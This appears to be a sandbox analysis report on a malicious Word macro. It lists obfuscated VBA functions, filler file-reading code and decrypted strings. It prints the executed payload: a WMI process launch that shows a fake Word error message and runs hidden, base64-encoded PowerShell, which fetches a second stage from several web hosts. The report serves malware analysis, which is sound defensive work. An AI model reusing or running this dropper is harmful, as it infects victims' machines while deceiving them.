109	Ma9hdg7q365lpb = Mid(mKbjhqs, (2 + 3), Len(mKbjhqs))	Mid Len("\x01 ]b2[s]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[s/]b2[sc]b2[s ]b2[sm]b2[ss]b2[sg]b2[s ]b2[s%]b2[su]b2[ss]b2[se]b2[sr]b2[sn]b2[sa]b2[sm]b2[se]b2[s%]b2[s ]b2[s/]b2[sv]b2[s ]b2[sW]b2[so]b2[sr]b2[sd]b2[s ]b2[se]b2[sx]b2[sp]b2[se]b2[sr]b2[si]b2[se]b2[sn]b2[sc]b2[se]b2[sd]b2[s ]b2[sa]b2[sn]b2[s ]b2[se]b2[sr]b2[sr]b2[so]b2[sr]b2[s ]b2[st]b2[sr]b2[sy]b2[si]b2[sn]b2[sg]b2[s ]b2[st]b2[so]b2[s ]b2[so]b2[sp]b2[se]b2[sn]b2[s ]b2[st]b2[sh]b2[se]b2[s ]b2[sf]b2[si]b2[sl]b2[se]b2[s.]b2[s ]b2[s&]b2[s ]b2[s ]b2[sP]b2[s^]b2[sO]b2[sw]b2[s^]b2[se]b2[sr]b2[s^]b2[ss]b2[sh]b2[se]b2[s^]b2[sL]b2[s^]b2[sL]b2[s ]b2[s-]b2[sw]b2[s ]b2[sh]b2[si]b2[sd]b2[sd]b2[se]b2[sn]b2[s ]b2[s-]b2[sE]b2[sN]b2[sC]b2[sO]b2[sD]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s JAA]b2[s2AD]b2[skAb]b2[sQBE]b2[sAFQ]b2[sANw]b2[sAgA]b2[sCAA]b2[sPQA]b2[sgAF]b2[ssAd]b2[sAB5]b2[sAFA]b2[sARQ]b2[sBdA]b2[sCgA]b2[sIgB]b2[s7AD]b2[sEAf]b2[sQB7]b2[sADM]b2[sAfQ]b2[sB7A]b2[sDAA]b2[sfQB]b2[s7AD]b2[sIAf]b2[sQAi]b2[sAC0]b2[sAZg]b2[sAnA]b2[sFIA]b2[sJwA]b2[ssAC]b2[scAU]b2[swAn]b2[sACw]b2[sAJw]b2[sBZA]b2[sCcA]b2[sLAA]b2[snAF]b2[skAU]b2[swB0]b2[sAEU]b2[sATQ]b2[sAuA]b2[sEkA]b2[sTwA]b2[suAG]b2[sQAa]b2[sQBS]b2[sAEU]b2[sAYw]b2[sBUA]b2[sE8A]b2[sJwA]b2[spAC]b2[sAAO]b2[swAg]b2[sACA]b2[sAIA]b2[sAkA]b2[sHkA]b2[sMQA]b2[swAE]b2[skAI]b2[sAAg]b2[sAD0]b2[sAIA]b2[sBbA]b2[sFQA]b2[seQB]b2[swAE]b2[sUAX]b2[sQAo]b2[sACI]b2[sAew]b2[sA2A]b2[sH0A]b2[sewA]b2[szAH]b2[s0Ae]b2[swAy]b2[sAH0]b2[sAew]b2[sA3A]b2[sH0A]b2[sewA]b2[s0AH]b2[s0Ae]b2[swAx]b2[sAH0]b2[sAew]b2[sA1A]b2[sH0A]b2[sewA]b2[s4AH]b2[s0Ae]b2[swAw]b2[sAH0]b2[sAIg]b2[sAtA]b2[sGYA]b2[sIAA]b2[snAG]b2[sEAR]b2[swBl]b2[sAFI]b2[sAJw]b2[sAsA]b2[sCcA]b2[sdAA]b2[suAC]b2[scAL]b2[sAAn]b2[sAEU]b2[sAJw]b2[sAsA]b2[sCcA]b2[sWQB]b2[sTAH]b2[sQAJ]b2[swAs]b2[sACc]b2[sATg]b2[sBFA]b2[sCcA]b2[sLAA]b2[snAH]b2[sMAR]b2[sQBS]b2[sAHY]b2[sAaQ]b2[sBDA]b2[sCcA]b2[sLAA]b2[snAH]b2[sMAJ]b2[swAs]b2[sACc]b2[sAbQ]b2[sAuA]b2[sCcA]b2[sLAA]b2[snAG]b2[sUAU]b2[sABv]b2[sAGk]b2[sAbg]b2[sB0A]b2[sG0A]b2[sYQB]b2[suAC]b2[scAK]b2[sQA7]b2[sACQ]b2[sARQ]b2[sByA]b2[sHIA]b2[sbwB]b2[syAE]b2[sEAY]b2[swB0]b2[sAGk]b2[sAbw]b2[sBuA]b2[sFAA]b2[scgB]b2[slAG]b2[sYAZ]b2[sQBy]b2[sAGU]b2[sAbg]b2[sBjA]b2[sGUA]b2[sIAA]b2[s9AC]b2[sAAK]b2[sAAo]b2[sACc]b2[sAUw]b2[sBpA]b2[sCcA]b2[sKwA]b2[snAG]b2[swAZ]b2[sQBu]b2[sAHQ]b2[sAbA]b2[sB5A]b2[sCcA]b2[sKQA]b2[srAC]b2[sgAJ]b2[swBD]b2[sAG8]b2[sAJw]b2[sArA]b2[sCcA]b2[sbgA]b2[snAC]b2[skAK]b2[swAn]b2[sAHQ]b2[sAJw]b2[sArA]b2[sCgA]b2[sJwB]b2[spAG]b2[s4AJ]b2[swAr]b2[sACc]b2[sAdQ]b2[sAnA]b2[sCkA]b2[sKwA]b2[snAG]b2[sUAJ]b2[swAp]b2[sADs]b2[sAJA]b2[sBQA]b2[sHkA]b2[sMAB]b2[slAG]b2[sIAa]b2[sgBp]b2[sAD0]b2[sAJA]b2[sBLA]b2[sDEA]b2[sMgB]b2[sPAC]b2[sAAK]b2[swAg]b2[sAFs]b2[sAYw]b2[sBoA]b2[sGEA]b2[scgB]b2[sdAC]b2[sgAN]b2[sgA0]b2[sACk]b2[sAIA]b2[sArA]b2[sCAA]b2[sJAB]b2[sQAD]b2[sYAN]b2[sQBa]b2[sADs]b2[sAJA]b2[sBYA]b2[sDkA]b2[sMgB]b2[sDAD]b2[s0AK]b2[sAAo]b2[sACc]b2[sAVQ]b2[sAnA]b2[sCsA]b2[sJwB]b2[sfAD]b2[sgAJ]b2[swAp]b2[sACs]b2[sAJw]b2[sBSA]b2[sCcA]b2[sKQA]b2[s7AC]b2[sAAI]b2[sAAk]b2[sADY]b2[sAOQ]b2[sBNA]b2[sGQA]b2[sdAA]b2[s3AD]b2[soAO]b2[sgAi]b2[sAEM]b2[sAcg]b2[sBgA]b2[sGUA]b2[sYQB]b2[sUAG]b2[sAAR]b2[sQBk]b2[sAEk]b2[sAUg]b2[sBFA]b2[sEMA]b2[sdAB]b2[svAG]b2[sAAU]b2[sgBZ]b2[sACI]b2[sAKA]b2[sAkA]b2[sEgA]b2[sTwB]b2[sNAE]b2[sUAI]b2[sAAr]b2[sACA]b2[sAKA]b2[sAoA]b2[sCcA]b2[sWgA]b2[snAC]b2[ssAK]b2[sAAn]b2[sAE0]b2[sAJw]b2[sArA]b2[sCcA]b2[sUAB]b2[sZAG]b2[scAe]b2[sQAn]b2[sACs]b2[sAJw]b2[sBoA]b2[sCcA]b2[sKQA]b2[srAC]b2[sgAJ]b2[swBs]b2[sAHE]b2[sAdA]b2[sBaA]b2[sCcA]b2[sKwA]b2[snAE]b2[s0AJ]b2[swAp]b2[sACs]b2[sAJw]b2[sBQA]b2[sEIA]b2[sJwA]b2[srAC]b2[sgAJ]b2[swB4]b2[sACc]b2[sAKw]b2[sAnA]b2[sDUA]b2[sagA]b2[snAC]b2[skAK]b2[swAn]b2[sAGY]b2[sAJw]b2[sArA]b2[sCgA]b2[sJwB]b2[stAG]b2[s8AW]b2[sgBN]b2[sACc]b2[sAKw]b2[sAnA]b2[sFAA]b2[sJwA]b2[spAC]b2[skAL]b2[sQBS]b2[sAGU]b2[sAcA]b2[sBsA]b2[sGEA]b2[sYwB]b2[sFAC]b2[sgAW]b2[swBD]b2[sAGg]b2[sAYQ]b2[sBSA]b2[sF0A]b2[sOQA]b2[swAC]b2[ssAW]b2[swBD]b2[sAGg]b2[sAYQ]b2[sBSA]b2[sF0A]b2[sNwA]b2[s3AC]b2[ssAW]b2[swBD]b2[sAGg]b2[sAYQ]b2[sBSA]b2[sF0A]b2[sOAA]b2[swAC]b2[skAL]b2[sABb]b2[sAEM]b2[sAaA]b2) -> 14756 executed
110	Goto XRvZBDBD
111	Dim nTckscaDq() as Byte
112	Dim pYTRxECC as Integer
113	pYTRxECC = FreeFile	FreeFile
114	Open "F:\SVdfFCU\nnqUrp\YWmSNHII.kFjgBgDk" For Binary Access Read As # pYTRxECC	Open
115	Open "O:\NCeDGUAx\liGyAIZj\lUyiD.VfSxEM" For Binary Access Read As # pYTRxECC	Open
116	Redim nTckscaDq(1 To LOF(intGend) - 5)	LOF intGend
117	Get # pYTRxECC, , nTckscaDq
118	Get # pYTRxECC, , nTckscaDq
119	Get # pYTRxECC, , nTckscaDq
120	Close # pYTRxECC
120	XRvZBDBD:
122	Goto oMoXwHAi
123	Dim HNtcACoR() as Byte
124	Dim zaZqi as Integer
125	zaZqi = FreeFile	FreeFile
126	Open "F:\nByRqYG\TFriHa\TImuB.vzTdgVSJ" For Binary Access Read As # zaZqi	Open
127	Open "O:\OoAuHBF\TrVff\lRegJKh.zDCEsFDJE" For Binary Access Read As # zaZqi	Open
128	Redim HNtcACoR(1 To LOF(intGend) - 5)	LOF intGend
129	Get # zaZqi, , HNtcACoR
130	Get # zaZqi, , HNtcACoR
131	Get # zaZqi, , HNtcACoR
132	Close # zaZqi
132	oMoXwHAi:
134	Fcqv6woostm0.Create Lehj73snaqzhyepdw9(Ma9hdg7q365lpb), Ndofzqkqt8o8ky4, Es2mklc5pr30boja	SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZAGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnAFoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMAJwArACcAbwB3AC8AJwArACcASgBIAC8AQAAnACsAJwBdAGIAMgBbAHMAOgAvACcAKQArACcALwBhACcAKwAoACcAYgAnACsAJwByAGkAbAAnACkAKwAoACcAbABvAGYAJwArACcAdQAnACkAKwAoACcAcgBuAGkAdAAnACsAJwB1ACcAKQArACgAJwByACcAKwAnAGUALgBjACcAKQArACgAJwBvAG0ALwBiACcAKwAnAHAAaAAnACsAJwAtACcAKwAnAG4AYwBsAGUAeAAtAHcAeQAnACsAJwBnACcAKQArACgAJwBxACcAKwAnADQAJwArACcALwBhADcAbgBCACcAKQArACcAZgAnACsAKAAnAGgAcwAnACsAJwAvACcAKQArACcAQAAnACsAJwBdACcAKwAoACcAYgAyACcAKwAnAFsAJwApACsAKAAnAHMAJwArACcAcwA6AC8AJwArACcALwBlAHQAJwArACcAawAnACsAJwBpAG4AZABlAGQAJwApACsAKAAnAGUAawAnACsAJwB0AGkAZgBsAGkAawAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHAAYwAnACsAJwBpAGUALQBzACcAKwAnAHAAJwApACsAJwBlACcAKwAoACcAZQBkAC8AJwArACcAVQAvAEAAXQBiADIAWwAnACsAJwBzAHMAJwApACsAKAAnADoALwAvAHYAcwB0ACcAKwAnAHMAJwArACcAYQAnACkAKwAnAG0AcAAnACsAKAAnAGwAZQAnACsAJwAuAGMAbwBtAC8AdwBwAC0AJwArACcAaQBuAGMAbAAnACsAJwB1AGQAJwArACcAZQBzACcAKwAnAC8AJwArACcANwBlAFgAJwApACsAKAAnAGUASQAnACsAJwAvACcAKwAnAEAAXQBiADIAWwAnACkAKwAnAHMAOgAnACsAJwAvAC8AJwArACgAJwBlAHoAaQAnACsAJwAtAHAAbwBzAC4AYwAnACsAJwBvAG0ALwBjACcAKwAnAGEAdABlAGcAbwByAHkAJwArACcAbAAnACsAJwAvAHgALwAnACkAKQAuACIAcgBFAHAAbABBAGAAYwBlACIAKAAoACcAXQA,,) -> 0 Ndofzqkqt8o8ky4 Es2mklc5pr30boja executed
135	Goto vSgqJI
136	Dim uqjqkyHX() as Byte
137	Dim ovskCI as Integer
138	ovskCI = FreeFile	FreeFile
139	Open "F:\UkqzBHD\AfilMCw\FaEXXAH.VJBQHBwD" For Binary Access Read As # ovskCI	Open
140	Open "O:\uYQKM\KtKdHCsGD\lkgPV.CtEPFIa" For Binary Access Read As # ovskCI	Open
141	Redim uqjqkyHX(1 To LOF(intGend) - 5)	LOF intGend
142	Get # ovskCI, , uqjqkyHX
143	Get # ovskCI, , uqjqkyHX
144	Get # ovskCI, , uqjqkyHX
145	Close # ovskCI
145	vSgqJI:
147	Goto iNgaE
148	Dim DCGxZIHE() as Byte
149	Dim FELuBTD as Integer
150	FELuBTD = FreeFile	FreeFile
151	Open "F:\AlLTF\KjklIF\ZbOCaDfmF.zRWqJ" For Binary Access Read As # FELuBTD	Open
152	Open "O:\CSYaI\BeKGII\ISlAUHBA.hUrieDEBA" For Binary Access Read As # FELuBTD	Open
153	Redim DCGxZIHE(1 To LOF(intGend) - 5)	LOF intGend
154	Get # FELuBTD, , DCGxZIHE
155	Get # FELuBTD, , DCGxZIHE
156	Get # FELuBTD, , DCGxZIHE
157	Close # FELuBTD
157	iNgaE:
159	End Function

Function Lehj73snaqzhyepdw9, APIs: 33, Strings: 8, Number of lines: 54, Relevance: 61.554

APIs	Meta Information
FreeFile
Open
Open
LOF
intGend
FreeFile
Open
Open
LOF
intGend
Part of subcall function Jumkzxvtzz2s@Xhlj9irufb65_wekzf: G9cdtgijbhc3ewc
Part of subcall function Jumkzxvtzz2s@Xhlj9irufb65_wekzf: FreeFile
Part of subcall function Jumkzxvtzz2s@Xhlj9irufb65_wekzf: Open
Part of subcall function Jumkzxvtzz2s@Xhlj9irufb65_wekzf: Open
Part of subcall function Jumkzxvtzz2s@Xhlj9irufb65_wekzf: LOF
Part of subcall function Jumkzxvtzz2s@Xhlj9irufb65_wekzf: intGend
Part of subcall function Jumkzxvtzz2s@Xhlj9irufb65_wekzf: Replace
Part of subcall function Jumkzxvtzz2s@Xhlj9irufb65_wekzf: Dh8iwtx_gbrodi
Part of subcall function Jumkzxvtzz2s@Xhlj9irufb65_wekzf: FreeFile
Part of subcall function Jumkzxvtzz2s@Xhlj9irufb65_wekzf: Open
Part of subcall function Jumkzxvtzz2s@Xhlj9irufb65_wekzf: Open
Part of subcall function Jumkzxvtzz2s@Xhlj9irufb65_wekzf: LOF
Part of subcall function Jumkzxvtzz2s@Xhlj9irufb65_wekzf: intGend
FreeFile
Open
Open
LOF
intGend
FreeFile
Open
Open
LOF
intGend

Strings	Decrypted Strings
"F:\CmcVFs\XishGzBCo\hcyLYIRH.wmCZaBADB"
"O:\QYYEIdD\lneIGGHdk\tPJGEIe.xXBLI"
"F:\LvKnA\BOtUEZATF\XZQseKaFA.wNmzM"
"O:\rueRG\VzWpbFH\IjzjDqRCA.NfKzekAB"
"F:\rRIMGI\pwZWJ\AvgVBxG.OaxnnLJb"
"O:\vzest\bkKRAHG\viWaCHFyl.borAIDhH"
"F:\bdvnDGG\YcExI\ktRsYELAd.fmxbB"
"O:\hTNkC\vnsiEILT\lOvmX.DAaIToDF"

Line	Instruction	Meta Information
160	Function Lehj73snaqzhyepdw9(Wft58t8kair)
161	On Error Resume Next	executed
162	Goto WvseC
163	Dim pKryCIHFC() as Byte
164	Dim GvYvntR as Integer
165	GvYvntR = FreeFile	FreeFile
166	Open "F:\CmcVFs\XishGzBCo\hcyLYIRH.wmCZaBADB" For Binary Access Read As # GvYvntR	Open
167	Open "O:\QYYEIdD\lneIGGHdk\tPJGEIe.xXBLI" For Binary Access Read As # GvYvntR	Open
168	Redim pKryCIHFC(1 To LOF(intGend) - 5)	LOF intGend
169	Get # GvYvntR, , pKryCIHFC
170	Get # GvYvntR, , pKryCIHFC
171	Get # GvYvntR, , pKryCIHFC
172	Close # GvYvntR
172	WvseC:
174	Gybrsxbkupnb96n = (Wft58t8kair)
175	Goto DtPcJVH
176	Dim LveTGO() as Byte
177	Dim CMVnWpNGG as Integer
178	CMVnWpNGG = FreeFile	FreeFile
179	Open "F:\LvKnA\BOtUEZATF\XZQseKaFA.wNmzM" For Binary Access Read As # CMVnWpNGG	Open
180	Open "O:\rueRG\VzWpbFH\IjzjDqRCA.NfKzekAB" For Binary Access Read As # CMVnWpNGG	Open
181	Redim LveTGO(1 To LOF(intGend) - 5)	LOF intGend
182	Get # CMVnWpNGG, , LveTGO
183	Get # CMVnWpNGG, , LveTGO
184	Get # CMVnWpNGG, , LveTGO
185	Close # CMVnWpNGG
185	DtPcJVH:
187	Htqq1guc2d740 = Jumkzxvtzz2s(Gybrsxbkupnb96n)
188	Goto VSmdWBCHE
189	Dim TOmTI() as Byte
190	Dim IyJitF as Integer
191	IyJitF = FreeFile	FreeFile
192	Open "F:\rRIMGI\pwZWJ\AvgVBxG.OaxnnLJb" For Binary Access Read As # IyJitF	Open
193	Open "O:\vzest\bkKRAHG\viWaCHFyl.borAIDhH" For Binary Access Read As # IyJitF	Open
194	Redim TOmTI(1 To LOF(intGend) - 5)	LOF intGend
195	Get # IyJitF, , TOmTI
196	Get # IyJitF, , TOmTI
197	Get # IyJitF, , TOmTI
198	Close # IyJitF
198	VSmdWBCHE:
200	Lehj73snaqzhyepdw9 = Htqq1guc2d740
201	Goto qQuwLC
202	Dim erxovx() as Byte
203	Dim FRpvMrG as Integer
204	FRpvMrG = FreeFile	FreeFile
205	Open "F:\bdvnDGG\YcExI\ktRsYELAd.fmxbB" For Binary Access Read As # FRpvMrG	Open
206	Open "O:\hTNkC\vnsiEILT\lOvmX.DAaIToDF" For Binary Access Read As # FRpvMrG	Open
207	Redim erxovx(1 To LOF(intGend) - 5)	LOF intGend
208	Get # FRpvMrG, , erxovx
209	Get # FRpvMrG, , erxovx
210	Get # FRpvMrG, , erxovx
211	Close # FRpvMrG
211	qQuwLC:
213	End Function

Function Jumkzxvtzz2s, APIs: 13, Strings: 5, Number of lines: 28, Relevance: 36.778

APIs	Meta Information
G9cdtgijbhc3ewc
FreeFile
Open
Open
LOF
intGend
Replace	Replace("w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s]b2[ss]b2[s]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s]b2[sp]b2[s]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s","]b2[s",) -> winmgmts:win32_process Replace("]b2[s]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[s/]b2[sc]b2[s ]b2[sm]b2[ss]b2[sg]b2[s ]b2[s%]b2[su]b2[ss]b2[se]b2[sr]b2[sn]b2[sa]b2[sm]b2[se]b2[s%]b2[s ]b2[s/]b2[sv]b2[s ]b2[sW]b2[so]b2[sr]b2[sd]b2[s ]b2[se]b2[sx]b2[sp]b2[se]b2[sr]b2[si]b2[se]b2[sn]b2[sc]b2[se]b2[sd]b2[s ]b2[sa]b2[sn]b2[s ]b2[se]b2[sr]b2[sr]b2[so]b2[sr]b2[s ]b2[st]b2[sr]b2[sy]b2[si]b2[sn]b2[sg]b2[s ]b2[st]b2[so]b2[s ]b2[so]b2[sp]b2[se]b2[sn]b2[s ]b2[st]b2[sh]b2[se]b2[s ]b2[sf]b2[si]b2[sl]b2[se]b2[s.]b2[s ]b2[s&]b2[s ]b2[s ]b2[sP]b2[s^]b2[sO]b2[sw]b2[s^]b2[se]b2[sr]b2[s^]b2[ss]b2[sh]b2[se]b2[s^]b2[sL]b2[s^]b2[sL]b2[s ]b2[s-]b2[sw]b2[s ]b2[sh]b2[si]b2[sd]b2[sd]b2[se]b2[sn]b2[s ]b2[s-]b2[sE]b2[sN]b2[sC]b2[sO]b2[sD]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s JAA]b2[s2AD]b2[skAb]b2[sQBE]b2[sAFQ]b2[sANw]b2[sAgA]b2[sCAA]b2[sPQA]b2[sgAF]b2[ssAd]b2[sAB5]b2[sAFA]b2[sARQ]b2[sBdA]b2[sCgA]b2[sIgB]b2[s7AD]b2[sEAf]b2[sQB7]b2[sADM]b2[sAfQ]b2[sB7A]b2[sDAA]b2[sfQB]b2[s7AD]b2[sIAf]b2[sQAi]b2[sAC0]b2[sAZg]b2[sAnA]b2[sFIA]b2[sJwA]b2[ssAC]b2[scAU]b2[swAn]b2[sACw]b2[sAJw]b2[sBZA]b2[sCcA]b2[sLAA]b2[snAF]b2[skAU]b2[swB0]b2[sAEU]b2[sATQ]b2[sAuA]b2[sEkA]b2[sTwA]b2[suAG]b2[sQAa]b2[sQBS]b2[sAEU]b2[sAYw]b2[sBUA]b2[sE8A]b2[sJwA]b2[spAC]b2[sAAO]b2[swAg]b2[sACA]b2[sAIA]b2[sAkA]b2[sHkA]b2[sMQA]b2[swAE]b2[skAI]b2[sAAg]b2[sAD0]b2[sAIA]b2[sBbA]b2[sFQA]b2[seQB]b2[swAE]b2[sUAX]b2[sQAo]b2[sACI]b2[sAew]b2[sA2A]b2[sH0A]b2[sewA]b2[szAH]b2[s0Ae]b2[swAy]b2[sAH0]b2[sAew]b2[sA3A]b2[sH0A]b2[sewA]b2[s0AH]b2[s0Ae]b2[swAx]b2[sAH0]b2[sAew]b2[sA1A]b2[sH0A]b2[sewA]b2[s4AH]b2[s0Ae]b2[swAw]b2[sAH0]b2[sAIg]b2[sAtA]b2[sGYA]b2[sIAA]b2[snAG]b2[sEAR]b2[swBl]b2[sAFI]b2[sAJw]b2[sAsA]b2[sCcA]b2[sdAA]b2[suAC]b2[scAL]b2[sAAn]b2[sAEU]b2[sAJw]b2[sAsA]b2[sCcA]b2[sWQB]b2[sTAH]b2[sQAJ]b2[swAs]b2[sACc]b2[sATg]b2[sBFA]b2[sCcA]b2[sLAA]b2[snAH]b2[sMAR]b2[sQBS]b2[sAHY]b2[sAaQ]b2[sBDA]b2[sCcA]b2[sLAA]b2[snAH]b2[sMAJ]b2[swAs]b2[sACc]b2[sAbQ]b2[sAuA]b2[sCcA]b2[sLAA]b2[snAG]b2[sUAU]b2[sABv]b2[sAGk]b2[sAbg]b2[sB0A]b2[sG0A]b2[sYQB]b2[suAC]b2[scAK]b2[sQA7]b2[sACQ]b2[sARQ]b2[sByA]b2[sHIA]b2[sbwB]b2[syAE]b2[sEAY]b2[swB0]b2[sAGk]b2[sAbw]b2[sBuA]b2[sFAA]b2[scgB]b2[slAG]b2[sYAZ]b2[sQBy]b2[sAGU]b2[sAbg]b2[sBjA]b2[sGUA]b2[sIAA]b2[s9AC]b2[sAAK]b2[sAAo]b2[sACc]b2[sAUw]b2[sBpA]b2[sCcA]b2[sKwA]b2[snAG]b2[swAZ]b2[sQBu]b2[sAHQ]b2[sAbA]b2[sB5A]b2[sCcA]b2[sKQA]b2[srAC]b2[sgAJ]b2[swBD]b2[sAG8]b2[sAJw]b2[sArA]b2[sCcA]b2[sbgA]b2[snAC]b2[skAK]b2[swAn]b2[sAHQ]b2[sAJw]b2[sArA]b2[sCgA]b2[sJwB]b2[spAG]b2[s4AJ]b2[swAr]b2[sACc]b2[sAdQ]b2[sAnA]b2[sCkA]b2[sKwA]b2[snAG]b2[sUAJ]b2[swAp]b2[sADs]b2[sAJA]b2[sBQA]b2[sHkA]b2[sMAB]b2[slAG]b2[sIAa]b2[sgBp]b2[sAD0]b2[sAJA]b2[sBLA]b2[sDEA]b2[sMgB]b2[sPAC]b2[sAAK]b2[swAg]b2[sAFs]b2[sAYw]b2[sBoA]b2[sGEA]b2[scgB]b2[sdAC]b2[sgAN]b2[sgA0]b2[sACk]b2[sAIA]b2[sArA]b2[sCAA]b2[sJAB]b2[sQAD]b2[sYAN]b2[sQBa]b2[sADs]b2[sAJA]b2[sBYA]b2[sDkA]b2[sMgB]b2[sDAD]b2[s0AK]b2[sAAo]b2[sACc]b2[sAVQ]b2[sAnA]b2[sCsA]b2[sJwB]b2[sfAD]b2[sgAJ]b2[swAp]b2[sACs]b2[sAJw]b2[sBSA]b2[sCcA]b2[sKQA]b2[s7AC]b2[sAAI]b2[sAAk]b2[sADY]b2[sAOQ]b2[sBNA]b2[sGQA]b2[sdAA]b2[s3AD]b2[soAO]b2[sgAi]b2[sAEM]b2[sAcg]b2[sBgA]b2[sGUA]b2[sYQB]b2[sUAG]b2[sAAR]b2[sQBk]b2[sAEk]b2[sAUg]b2[sBFA]b2[sEMA]b2[sdAB]b2[svAG]b2[sAAU]b2[sgBZ]b2[sACI]b2[sAKA]b2[sAkA]b2[sEgA]b2[sTwB]b2[sNAE]b2[sUAI]b2[sAAr]b2[sACA]b2[sAKA]b2[sAoA]b2[sCcA]b2[sWgA]b2[snAC]b2[ssAK]b2[sAAn]b2[sAE0]b2[sAJw]b2[sArA]b2[sCcA]b2[sUAB]b2[sZAG]b2[scAe]b2[sQAn]b2[sACs]b2[sAJw]b2[sBoA]b2[sCcA]b2[sKQA]b2[srAC]b2